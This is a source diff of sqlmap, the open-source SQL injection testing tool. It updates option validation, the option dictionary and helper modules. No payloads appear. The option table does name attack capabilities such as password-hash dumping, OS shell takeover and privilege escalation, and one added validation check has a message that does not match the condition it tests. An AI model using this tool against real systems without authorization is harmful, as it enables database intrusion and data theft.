@@ -2101,6 +1956,8 @@ def _useWizardInterface():
|
|||||||
|
|
||||||
dataToStdout("\nsqlmap is running, please wait..\n\n")
|
dataToStdout("\nsqlmap is running, please wait..\n\n")
|
||||||
|
|
||||||
|
kb.wizardMode = True
|
||||||
|
|
||||||
def _saveConfig():
|
def _saveConfig():
|
||||||
"""
|
"""
|
||||||
Saves the command line options to a sqlmap configuration INI file
|
Saves the command line options to a sqlmap configuration INI file
|
||||||
@@ -2295,7 +2152,6 @@ def _setTorHttpProxySettings():
|
|||||||
errMsg = "can't establish connection with the Tor HTTP proxy. "
|
errMsg = "can't establish connection with the Tor HTTP proxy. "
|
||||||
errMsg += "Please make sure that you have Tor (bundle) installed and setup "
|
errMsg += "Please make sure that you have Tor (bundle) installed and setup "
|
||||||
errMsg += "so you could be able to successfully use switch '--tor' "
|
errMsg += "so you could be able to successfully use switch '--tor' "
|
||||||
|
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
||||||
if not conf.checkTor:
|
if not conf.checkTor:
|
||||||
@@ -2316,7 +2172,6 @@ def _setTorSocksProxySettings():
|
|||||||
errMsg = "can't establish connection with the Tor SOCKS proxy. "
|
errMsg = "can't establish connection with the Tor SOCKS proxy. "
|
||||||
errMsg += "Please make sure that you have Tor service installed and setup "
|
errMsg += "Please make sure that you have Tor service installed and setup "
|
||||||
errMsg += "so you could be able to successfully use switch '--tor' "
|
errMsg += "so you could be able to successfully use switch '--tor' "
|
||||||
|
|
||||||
raise SqlmapConnectionException(errMsg)
|
raise SqlmapConnectionException(errMsg)
|
||||||
|
|
||||||
# SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
|
# SOCKS5 to prevent DNS leaks (http://en.wikipedia.org/wiki/Tor_%28anonymity_network%29)
|
||||||
@@ -2329,7 +2184,7 @@ def _checkWebSocket():
|
|||||||
from websocket import ABNF
|
from websocket import ABNF
|
||||||
except ImportError:
|
except ImportError:
|
||||||
errMsg = "sqlmap requires third-party module 'websocket-client' "
|
errMsg = "sqlmap requires third-party module 'websocket-client' "
|
||||||
errMsg += "in order to use WebSocket funcionality"
|
errMsg += "in order to use WebSocket functionality"
|
||||||
raise SqlmapMissingDependence(errMsg)
|
raise SqlmapMissingDependence(errMsg)
|
||||||
|
|
||||||
def _checkTor():
|
def _checkTor():
|
||||||
@@ -2370,8 +2225,8 @@ def _basicOptionValidation():
|
|||||||
|
|
||||||
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
|
if isinstance(conf.limitStart, int) and conf.limitStart > 0 and \
|
||||||
isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
|
isinstance(conf.limitStop, int) and conf.limitStop < conf.limitStart:
|
||||||
errMsg = "value for option '--start' (limitStart) must be smaller or equal than value for --stop (limitStop) option"
|
warnMsg = "usage of option '--start' (limitStart) which is bigger than value for --stop (limitStop) option is considered unstable"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
logger.warn(warnMsg)
|
||||||
|
|
||||||
if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
|
if isinstance(conf.firstChar, int) and conf.firstChar > 0 and \
|
||||||
isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
|
isinstance(conf.lastChar, int) and conf.lastChar < conf.firstChar:
|
||||||
@@ -2386,6 +2241,10 @@ def _basicOptionValidation():
|
|||||||
errMsg = "switch '--eta' is incompatible with option '-v'"
|
errMsg = "switch '--eta' is incompatible with option '-v'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.secondUrl and conf.secondReq:
|
||||||
|
errMsg = "option '--second-url' is incompatible with option '--second-req')"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.direct and conf.url:
|
if conf.direct and conf.url:
|
||||||
errMsg = "option '-d' is incompatible with option '-u' ('--url')"
|
errMsg = "option '-d' is incompatible with option '-u' ('--url')"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
@@ -2418,6 +2277,10 @@ def _basicOptionValidation():
|
|||||||
errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
|
errMsg = "option '--not-string' is incompatible with switch '--null-connection'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
|
if conf.notString and conf.nullConnection:
|
||||||
|
errMsg = "option '--tor' is incompatible with switch '--os-pwn'"
|
||||||
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.noCast and conf.hexConvert:
|
if conf.noCast and conf.hexConvert:
|
||||||
errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
|
errMsg = "switch '--no-cast' is incompatible with switch '--hex'"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
@@ -2517,11 +2380,11 @@ def _basicOptionValidation():
|
|||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.checkTor and not any((conf.tor, conf.proxy)):
|
if conf.checkTor and not any((conf.tor, conf.proxy)):
|
||||||
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address using Tor)"
|
errMsg = "switch '--check-tor' requires usage of switch '--tor' (or option '--proxy' with HTTP proxy address of Tor service)"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
|
if conf.torPort is not None and not (isinstance(conf.torPort, int) and conf.torPort >= 0 and conf.torPort <= 65535):
|
||||||
errMsg = "value for option '--tor-port' must be in range 0-65535"
|
errMsg = "value for option '--tor-port' must be in range [0, 65535]"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
|
if conf.torType not in getPublicTypeMembers(PROXY_TYPE, True):
|
||||||
@@ -2563,15 +2426,15 @@ def _basicOptionValidation():
|
|||||||
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
|
errMsg += "format <username>:<password> (e.g. \"root:pass\")"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
|
|
||||||
if conf.charset:
|
if conf.encoding:
|
||||||
_ = checkCharEncoding(conf.charset, False)
|
_ = checkCharEncoding(conf.encoding, False)
|
||||||
if _ is None:
|
if _ is None:
|
||||||
errMsg = "unknown charset '%s'. Please visit " % conf.charset
|
errMsg = "unknown encoding '%s'. Please visit " % conf.encoding
|
||||||
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
|
errMsg += "'%s' to get the full list of " % CODECS_LIST_PAGE
|
||||||
errMsg += "supported charsets"
|
errMsg += "supported encodings"
|
||||||
raise SqlmapSyntaxException(errMsg)
|
raise SqlmapSyntaxException(errMsg)
|
||||||
else:
|
else:
|
||||||
conf.charset = _
|
conf.encoding = _
|
||||||
|
|
||||||
if conf.loadCookies:
|
if conf.loadCookies:
|
||||||
if not os.path.exists(conf.loadCookies):
|
if not os.path.exists(conf.loadCookies):
|
||||||
@@ -2604,8 +2467,7 @@ def init():
|
|||||||
_setRequestFromFile()
|
_setRequestFromFile()
|
||||||
_cleanupOptions()
|
_cleanupOptions()
|
||||||
_cleanupEnvironment()
|
_cleanupEnvironment()
|
||||||
_dirtyPatches()
|
_purge()
|
||||||
_purgeOutput()
|
|
||||||
_checkDependencies()
|
_checkDependencies()
|
||||||
_createTemporaryDirectory()
|
_createTemporaryDirectory()
|
||||||
_basicOptionValidation()
|
_basicOptionValidation()
|
||||||
@@ -2614,6 +2476,7 @@ def init():
|
|||||||
_setDNSServer()
|
_setDNSServer()
|
||||||
_adjustLoggingFormatter()
|
_adjustLoggingFormatter()
|
||||||
_setMultipleTargets()
|
_setMultipleTargets()
|
||||||
|
_listTamperingFunctions()
|
||||||
_setTamperingFunctions()
|
_setTamperingFunctions()
|
||||||
_setWafFunctions()
|
_setWafFunctions()
|
||||||
_setTrafficOutputFP()
|
_setTrafficOutputFP()
|
||||||
|
|||||||
@@ -1,254 +1,259 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
optDict = {
|
optDict = {
|
||||||
# Format:
|
# Family: {"parameter name": "parameter datatype"},
|
||||||
# Family: { "parameter name": "parameter datatype" },
|
# --OR--
|
||||||
# Or:
|
# Family: {"parameter name": ("parameter datatype", "category name used for common outputs feature")},
|
||||||
# Family: { "parameter name": ("parameter datatype", "category name used for common outputs feature") },
|
|
||||||
"Target": {
|
|
||||||
"direct": "string",
|
|
||||||
"url": "string",
|
|
||||||
"logFile": "string",
|
|
||||||
"bulkFile": "string",
|
|
||||||
"requestFile": "string",
|
|
||||||
"sessionFile": "string",
|
|
||||||
"googleDork": "string",
|
|
||||||
"configFile": "string",
|
|
||||||
"sitemapUrl": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Request": {
|
"Target": {
|
||||||
"method": "string",
|
"direct": "string",
|
||||||
"data": "string",
|
"url": "string",
|
||||||
"paramDel": "string",
|
"logFile": "string",
|
||||||
"cookie": "string",
|
"bulkFile": "string",
|
||||||
"cookieDel": "string",
|
"requestFile": "string",
|
||||||
"loadCookies": "string",
|
"sessionFile": "string",
|
||||||
"dropSetCookie": "boolean",
|
"googleDork": "string",
|
||||||
"agent": "string",
|
"configFile": "string",
|
||||||
"randomAgent": "boolean",
|
"sitemapUrl": "string",
|
||||||
"host": "string",
|
},
|
||||||
"referer": "string",
|
|
||||||
"headers": "string",
|
|
||||||
"authType": "string",
|
|
||||||
"authCred": "string",
|
|
||||||
"authFile": "string",
|
|
||||||
"ignore401": "boolean",
|
|
||||||
"ignoreProxy": "boolean",
|
|
||||||
"ignoreRedirects": "boolean",
|
|
||||||
"ignoreTimeouts": "boolean",
|
|
||||||
"proxy": "string",
|
|
||||||
"proxyCred": "string",
|
|
||||||
"proxyFile": "string",
|
|
||||||
"tor": "boolean",
|
|
||||||
"torPort": "integer",
|
|
||||||
"torType": "string",
|
|
||||||
"checkTor": "boolean",
|
|
||||||
"delay": "float",
|
|
||||||
"timeout": "float",
|
|
||||||
"retries": "integer",
|
|
||||||
"rParam": "string",
|
|
||||||
"safeUrl": "string",
|
|
||||||
"safePost": "string",
|
|
||||||
"safeReqFile": "string",
|
|
||||||
"safeFreq": "integer",
|
|
||||||
"skipUrlEncode": "boolean",
|
|
||||||
"csrfToken": "string",
|
|
||||||
"csrfUrl": "string",
|
|
||||||
"forceSSL": "boolean",
|
|
||||||
"hpp": "boolean",
|
|
||||||
"evalCode": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Optimization": {
|
"Request": {
|
||||||
"optimize": "boolean",
|
"method": "string",
|
||||||
"predictOutput": "boolean",
|
"data": "string",
|
||||||
"keepAlive": "boolean",
|
"paramDel": "string",
|
||||||
"nullConnection": "boolean",
|
"cookie": "string",
|
||||||
"threads": "integer",
|
"cookieDel": "string",
|
||||||
},
|
"loadCookies": "string",
|
||||||
|
"dropSetCookie": "boolean",
|
||||||
|
"agent": "string",
|
||||||
|
"randomAgent": "boolean",
|
||||||
|
"host": "string",
|
||||||
|
"referer": "string",
|
||||||
|
"headers": "string",
|
||||||
|
"authType": "string",
|
||||||
|
"authCred": "string",
|
||||||
|
"authFile": "string",
|
||||||
|
"ignoreCode": "integer",
|
||||||
|
"ignoreProxy": "boolean",
|
||||||
|
"ignoreRedirects": "boolean",
|
||||||
|
"ignoreTimeouts": "boolean",
|
||||||
|
"proxy": "string",
|
||||||
|
"proxyCred": "string",
|
||||||
|
"proxyFile": "string",
|
||||||
|
"tor": "boolean",
|
||||||
|
"torPort": "integer",
|
||||||
|
"torType": "string",
|
||||||
|
"checkTor": "boolean",
|
||||||
|
"delay": "float",
|
||||||
|
"timeout": "float",
|
||||||
|
"retries": "integer",
|
||||||
|
"rParam": "string",
|
||||||
|
"safeUrl": "string",
|
||||||
|
"safePost": "string",
|
||||||
|
"safeReqFile": "string",
|
||||||
|
"safeFreq": "integer",
|
||||||
|
"skipUrlEncode": "boolean",
|
||||||
|
"csrfToken": "string",
|
||||||
|
"csrfUrl": "string",
|
||||||
|
"forceSSL": "boolean",
|
||||||
|
"hpp": "boolean",
|
||||||
|
"evalCode": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"Injection": {
|
"Optimization": {
|
||||||
"testParameter": "string",
|
"optimize": "boolean",
|
||||||
"skip": "string",
|
"predictOutput": "boolean",
|
||||||
"skipStatic": "boolean",
|
"keepAlive": "boolean",
|
||||||
"paramExclude": "string",
|
"nullConnection": "boolean",
|
||||||
"dbms": "string",
|
"threads": "integer",
|
||||||
"dbmsCred": "string",
|
},
|
||||||
"os": "string",
|
|
||||||
"invalidBignum": "boolean",
|
|
||||||
"invalidLogical": "boolean",
|
|
||||||
"invalidString": "boolean",
|
|
||||||
"noCast": "boolean",
|
|
||||||
"noEscape": "boolean",
|
|
||||||
"prefix": "string",
|
|
||||||
"suffix": "string",
|
|
||||||
"tamper": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Detection": {
|
"Injection": {
|
||||||
"level": "integer",
|
"testParameter": "string",
|
||||||
"risk": "integer",
|
"skip": "string",
|
||||||
"string": "string",
|
"skipStatic": "boolean",
|
||||||
"notString": "string",
|
"paramExclude": "string",
|
||||||
"regexp": "string",
|
"dbms": "string",
|
||||||
"code": "integer",
|
"dbmsCred": "string",
|
||||||
"textOnly": "boolean",
|
"os": "string",
|
||||||
"titles": "boolean",
|
"invalidBignum": "boolean",
|
||||||
},
|
"invalidLogical": "boolean",
|
||||||
|
"invalidString": "boolean",
|
||||||
|
"noCast": "boolean",
|
||||||
|
"noEscape": "boolean",
|
||||||
|
"prefix": "string",
|
||||||
|
"suffix": "string",
|
||||||
|
"tamper": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"Techniques": {
|
"Detection": {
|
||||||
"tech": "string",
|
"level": "integer",
|
||||||
"timeSec": "integer",
|
"risk": "integer",
|
||||||
"uCols": "string",
|
"string": "string",
|
||||||
"uChar": "string",
|
"notString": "string",
|
||||||
"uFrom": "string",
|
"regexp": "string",
|
||||||
"dnsDomain": "string",
|
"code": "integer",
|
||||||
"secondOrder": "string",
|
"textOnly": "boolean",
|
||||||
},
|
"titles": "boolean",
|
||||||
|
},
|
||||||
|
|
||||||
"Fingerprint": {
|
"Techniques": {
|
||||||
"extensiveFp": "boolean",
|
"tech": "string",
|
||||||
},
|
"timeSec": "integer",
|
||||||
|
"uCols": "string",
|
||||||
|
"uChar": "string",
|
||||||
|
"uFrom": "string",
|
||||||
|
"dnsDomain": "string",
|
||||||
|
"secondUrl": "string",
|
||||||
|
"secondReq": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"Enumeration": {
|
"Fingerprint": {
|
||||||
"getAll": "boolean",
|
"extensiveFp": "boolean",
|
||||||
"getBanner": ("boolean", "Banners"),
|
},
|
||||||
"getCurrentUser": ("boolean", "Users"),
|
|
||||||
"getCurrentDb": ("boolean", "Databases"),
|
|
||||||
"getHostname": "boolean",
|
|
||||||
"isDba": "boolean",
|
|
||||||
"getUsers": ("boolean", "Users"),
|
|
||||||
"getPasswordHashes": ("boolean", "Passwords"),
|
|
||||||
"getPrivileges": ("boolean", "Privileges"),
|
|
||||||
"getRoles": ("boolean", "Roles"),
|
|
||||||
"getDbs": ("boolean", "Databases"),
|
|
||||||
"getTables": ("boolean", "Tables"),
|
|
||||||
"getColumns": ("boolean", "Columns"),
|
|
||||||
"getSchema": "boolean",
|
|
||||||
"getCount": "boolean",
|
|
||||||
"dumpTable": "boolean",
|
|
||||||
"dumpAll": "boolean",
|
|
||||||
"search": "boolean",
|
|
||||||
"getComments": "boolean",
|
|
||||||
"db": "string",
|
|
||||||
"tbl": "string",
|
|
||||||
"col": "string",
|
|
||||||
"excludeCol": "string",
|
|
||||||
"pivotColumn": "string",
|
|
||||||
"dumpWhere": "string",
|
|
||||||
"user": "string",
|
|
||||||
"excludeSysDbs": "boolean",
|
|
||||||
"limitStart": "integer",
|
|
||||||
"limitStop": "integer",
|
|
||||||
"firstChar": "integer",
|
|
||||||
"lastChar": "integer",
|
|
||||||
"query": "string",
|
|
||||||
"sqlShell": "boolean",
|
|
||||||
"sqlFile": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Brute": {
|
"Enumeration": {
|
||||||
"commonTables": "boolean",
|
"getAll": "boolean",
|
||||||
"commonColumns": "boolean",
|
"getBanner": ("boolean", "Banners"),
|
||||||
},
|
"getCurrentUser": ("boolean", "Users"),
|
||||||
|
"getCurrentDb": ("boolean", "Databases"),
|
||||||
|
"getHostname": "boolean",
|
||||||
|
"isDba": "boolean",
|
||||||
|
"getUsers": ("boolean", "Users"),
|
||||||
|
"getPasswordHashes": ("boolean", "Passwords"),
|
||||||
|
"getPrivileges": ("boolean", "Privileges"),
|
||||||
|
"getRoles": ("boolean", "Roles"),
|
||||||
|
"getDbs": ("boolean", "Databases"),
|
||||||
|
"getTables": ("boolean", "Tables"),
|
||||||
|
"getColumns": ("boolean", "Columns"),
|
||||||
|
"getSchema": "boolean",
|
||||||
|
"getCount": "boolean",
|
||||||
|
"dumpTable": "boolean",
|
||||||
|
"dumpAll": "boolean",
|
||||||
|
"search": "boolean",
|
||||||
|
"getComments": "boolean",
|
||||||
|
"db": "string",
|
||||||
|
"tbl": "string",
|
||||||
|
"col": "string",
|
||||||
|
"exclude": "string",
|
||||||
|
"pivotColumn": "string",
|
||||||
|
"dumpWhere": "string",
|
||||||
|
"user": "string",
|
||||||
|
"excludeSysDbs": "boolean",
|
||||||
|
"limitStart": "integer",
|
||||||
|
"limitStop": "integer",
|
||||||
|
"firstChar": "integer",
|
||||||
|
"lastChar": "integer",
|
||||||
|
"query": "string",
|
||||||
|
"sqlShell": "boolean",
|
||||||
|
"sqlFile": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"User-defined function": {
|
"Brute": {
|
||||||
"udfInject": "boolean",
|
"commonTables": "boolean",
|
||||||
"shLib": "string",
|
"commonColumns": "boolean",
|
||||||
},
|
},
|
||||||
|
|
||||||
"File system": {
|
"User-defined function": {
|
||||||
"rFile": "string",
|
"udfInject": "boolean",
|
||||||
"wFile": "string",
|
"shLib": "string",
|
||||||
"dFile": "string",
|
},
|
||||||
},
|
|
||||||
|
|
||||||
"Takeover": {
|
"File system": {
|
||||||
"osCmd": "string",
|
"rFile": "string",
|
||||||
"osShell": "boolean",
|
"wFile": "string",
|
||||||
"osPwn": "boolean",
|
"dFile": "string",
|
||||||
"osSmb": "boolean",
|
},
|
||||||
"osBof": "boolean",
|
|
||||||
"privEsc": "boolean",
|
|
||||||
"msfPath": "string",
|
|
||||||
"tmpPath": "string",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Windows": {
|
"Takeover": {
|
||||||
"regRead": "boolean",
|
"osCmd": "string",
|
||||||
"regAdd": "boolean",
|
"osShell": "boolean",
|
||||||
"regDel": "boolean",
|
"osPwn": "boolean",
|
||||||
"regKey": "string",
|
"osSmb": "boolean",
|
||||||
"regVal": "string",
|
"osBof": "boolean",
|
||||||
"regData": "string",
|
"privEsc": "boolean",
|
||||||
"regType": "string",
|
"msfPath": "string",
|
||||||
},
|
"tmpPath": "string",
|
||||||
|
},
|
||||||
|
|
||||||
"General": {
|
"Windows": {
|
||||||
#"xmlFile": "string",
|
"regRead": "boolean",
|
||||||
"trafficFile": "string",
|
"regAdd": "boolean",
|
||||||
"batch": "boolean",
|
"regDel": "boolean",
|
||||||
"binaryFields": "string",
|
"regKey": "string",
|
||||||
"charset": "string",
|
"regVal": "string",
|
||||||
"checkInternet": "boolean",
|
"regData": "string",
|
||||||
"crawlDepth": "integer",
|
"regType": "string",
|
||||||
"crawlExclude": "string",
|
},
|
||||||
"csvDel": "string",
|
|
||||||
"dumpFormat": "string",
|
|
||||||
"eta": "boolean",
|
|
||||||
"flushSession": "boolean",
|
|
||||||
"forms": "boolean",
|
|
||||||
"freshQueries": "boolean",
|
|
||||||
"harFile": "string",
|
|
||||||
"hexConvert": "boolean",
|
|
||||||
"outputDir": "string",
|
|
||||||
"parseErrors": "boolean",
|
|
||||||
"saveConfig": "string",
|
|
||||||
"scope": "string",
|
|
||||||
"testFilter": "string",
|
|
||||||
"testSkip": "string",
|
|
||||||
"updateAll": "boolean",
|
|
||||||
},
|
|
||||||
|
|
||||||
"Miscellaneous": {
|
"General": {
|
||||||
"alert": "string",
|
# "xmlFile": "string",
|
||||||
"answers": "string",
|
"trafficFile": "string",
|
||||||
"beep": "boolean",
|
"batch": "boolean",
|
||||||
"cleanup": "boolean",
|
"binaryFields": "string",
|
||||||
"dependencies": "boolean",
|
"charset": "string",
|
||||||
"disableColoring": "boolean",
|
"checkInternet": "boolean",
|
||||||
"googlePage": "integer",
|
"crawlDepth": "integer",
|
||||||
"identifyWaf": "boolean",
|
"crawlExclude": "string",
|
||||||
"mobile": "boolean",
|
"csvDel": "string",
|
||||||
"offline": "boolean",
|
"dumpFormat": "string",
|
||||||
"purgeOutput": "boolean",
|
"encoding": "string",
|
||||||
"skipWaf": "boolean",
|
"eta": "boolean",
|
||||||
"smart": "boolean",
|
"flushSession": "boolean",
|
||||||
"tmpDir": "string",
|
"forms": "boolean",
|
||||||
"webRoot": "string",
|
"freshQueries": "boolean",
|
||||||
"wizard": "boolean",
|
"harFile": "string",
|
||||||
"verbose": "integer",
|
"hexConvert": "boolean",
|
||||||
},
|
"outputDir": "string",
|
||||||
"Hidden": {
|
"parseErrors": "boolean",
|
||||||
"dummy": "boolean",
|
"saveConfig": "string",
|
||||||
"disablePrecon": "boolean",
|
"scope": "string",
|
||||||
"profile": "boolean",
|
"testFilter": "string",
|
||||||
"forceDns": "boolean",
|
"testSkip": "string",
|
||||||
"murphyRate": "integer",
|
"updateAll": "boolean",
|
||||||
"smokeTest": "boolean",
|
},
|
||||||
"liveTest": "boolean",
|
|
||||||
"stopFail": "boolean",
|
"Miscellaneous": {
|
||||||
"runCase": "string",
|
"alert": "string",
|
||||||
},
|
"answers": "string",
|
||||||
"API": {
|
"beep": "boolean",
|
||||||
"api": "boolean",
|
"cleanup": "boolean",
|
||||||
"taskid": "string",
|
"dependencies": "boolean",
|
||||||
"database": "string",
|
"disableColoring": "boolean",
|
||||||
}
|
"googlePage": "integer",
|
||||||
}
|
"identifyWaf": "boolean",
|
||||||
|
"listTampers": "boolean",
|
||||||
|
"mobile": "boolean",
|
||||||
|
"offline": "boolean",
|
||||||
|
"purge": "boolean",
|
||||||
|
"skipWaf": "boolean",
|
||||||
|
"smart": "boolean",
|
||||||
|
"tmpDir": "string",
|
||||||
|
"webRoot": "string",
|
||||||
|
"wizard": "boolean",
|
||||||
|
"verbose": "integer",
|
||||||
|
},
|
||||||
|
|
||||||
|
"Hidden": {
|
||||||
|
"dummy": "boolean",
|
||||||
|
"disablePrecon": "boolean",
|
||||||
|
"profile": "boolean",
|
||||||
|
"forceDns": "boolean",
|
||||||
|
"murphyRate": "integer",
|
||||||
|
"smokeTest": "boolean",
|
||||||
|
"liveTest": "boolean",
|
||||||
|
"stopFail": "boolean",
|
||||||
|
"runCase": "string",
|
||||||
|
},
|
||||||
|
|
||||||
|
"API": {
|
||||||
|
"api": "boolean",
|
||||||
|
"taskid": "string",
|
||||||
|
"database": "string",
|
||||||
|
}
|
||||||
|
}
|
||||||
|
|||||||
26
lib/core/patch.py
Normal file
26
lib/core/patch.py
Normal file
@@ -0,0 +1,26 @@
|
|||||||
|
#!/usr/bin/env python
|
||||||
|
|
||||||
|
"""
|
||||||
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
|
See the file 'LICENSE' for copying permission
|
||||||
|
"""
|
||||||
|
|
||||||
|
import codecs
|
||||||
|
import httplib
|
||||||
|
|
||||||
|
from lib.core.settings import IS_WIN
|
||||||
|
|
||||||
|
def dirtyPatches():
|
||||||
|
"""
|
||||||
|
Place for "dirty" Python related patches
|
||||||
|
"""
|
||||||
|
|
||||||
|
# accept overly long result lines (e.g. SQLi results in HTTP header responses)
|
||||||
|
httplib._MAXLINE = 1 * 1024 * 1024
|
||||||
|
|
||||||
|
# add support for inet_pton() on Windows OS
|
||||||
|
if IS_WIN:
|
||||||
|
from thirdparty.wininetpton import win_inet_pton
|
||||||
|
|
||||||
|
# Reference: https://github.com/nodejs/node/issues/12786#issuecomment-298652440
|
||||||
|
codecs.register(lambda name: codecs.lookup("utf-8") if name == "cp65001" else None)
|
||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import codecs
|
import codecs
|
||||||
@@ -20,9 +20,9 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
|||||||
"""
|
"""
|
||||||
|
|
||||||
try:
|
try:
|
||||||
|
__import__("gobject")
|
||||||
from thirdparty.gprof2dot import gprof2dot
|
from thirdparty.gprof2dot import gprof2dot
|
||||||
from thirdparty.xdot import xdot
|
from thirdparty.xdot import xdot
|
||||||
import gobject
|
|
||||||
import gtk
|
import gtk
|
||||||
import pydot
|
import pydot
|
||||||
except ImportError, e:
|
except ImportError, e:
|
||||||
@@ -50,7 +50,7 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
|||||||
if os.path.exists(imageOutputFile):
|
if os.path.exists(imageOutputFile):
|
||||||
os.remove(imageOutputFile)
|
os.remove(imageOutputFile)
|
||||||
|
|
||||||
infoMsg = "profiling the execution into file %s" % profileOutputFile
|
infoMsg = "profiling the execution into file '%s'" % profileOutputFile
|
||||||
logger.info(infoMsg)
|
logger.info(infoMsg)
|
||||||
|
|
||||||
# Start sqlmap main function and generate a raw profile file
|
# Start sqlmap main function and generate a raw profile file
|
||||||
@@ -80,15 +80,20 @@ def profile(profileOutputFile=None, dotOutputFile=None, imageOutputFile=None):
|
|||||||
if isinstance(pydotGraph, list):
|
if isinstance(pydotGraph, list):
|
||||||
pydotGraph = pydotGraph[0]
|
pydotGraph = pydotGraph[0]
|
||||||
|
|
||||||
pydotGraph.write_png(imageOutputFile)
|
try:
|
||||||
|
pydotGraph.write_png(imageOutputFile)
|
||||||
|
except OSError:
|
||||||
|
errMsg = "profiling requires graphviz installed "
|
||||||
|
errMsg += "(Hint: 'sudo apt-get install graphviz')"
|
||||||
|
logger.error(errMsg)
|
||||||
|
else:
|
||||||
|
infoMsg = "displaying interactive graph with xdot library"
|
||||||
|
logger.info(infoMsg)
|
||||||
|
|
||||||
infoMsg = "displaying interactive graph with xdot library"
|
# Display interactive Graphviz dot file by using extra/xdot/xdot.py
|
||||||
logger.info(infoMsg)
|
# http://code.google.com/p/jrfonseca/wiki/XDot
|
||||||
|
win = xdot.DotWindow()
|
||||||
# Display interactive Graphviz dot file by using extra/xdot/xdot.py
|
win.connect('destroy', gtk.main_quit)
|
||||||
# http://code.google.com/p/jrfonseca/wiki/XDot
|
win.set_filter("dot")
|
||||||
win = xdot.DotWindow()
|
win.open_file(dotOutputFile)
|
||||||
win.connect('destroy', gtk.main_quit)
|
gtk.main()
|
||||||
win.set_filter("dot")
|
|
||||||
win.open_file(dotOutputFile)
|
|
||||||
gtk.main()
|
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
from lib.core.data import logger
|
from lib.core.data import logger
|
||||||
@@ -14,11 +14,11 @@ _readline = None
|
|||||||
try:
|
try:
|
||||||
from readline import *
|
from readline import *
|
||||||
import readline as _readline
|
import readline as _readline
|
||||||
except ImportError:
|
except:
|
||||||
try:
|
try:
|
||||||
from pyreadline import *
|
from pyreadline import *
|
||||||
import pyreadline as _readline
|
import pyreadline as _readline
|
||||||
except ImportError:
|
except:
|
||||||
pass
|
pass
|
||||||
|
|
||||||
if IS_WIN and _readline:
|
if IS_WIN and _readline:
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
|||||||
#!/usr/bin/env python
|
#!/usr/bin/env python
|
||||||
|
|
||||||
"""
|
"""
|
||||||
Copyright (c) 2006-2017 sqlmap developers (http://sqlmap.org/)
|
Copyright (c) 2006-2018 sqlmap developers (http://sqlmap.org/)
|
||||||
See the file 'doc/COPYING' for copying permission
|
See the file 'LICENSE' for copying permission
|
||||||
"""
|
"""
|
||||||
|
|
||||||
import sqlite3
|
import sqlite3
|
||||||
|
|||||||
@@ -1,8 +1,8 @@
|
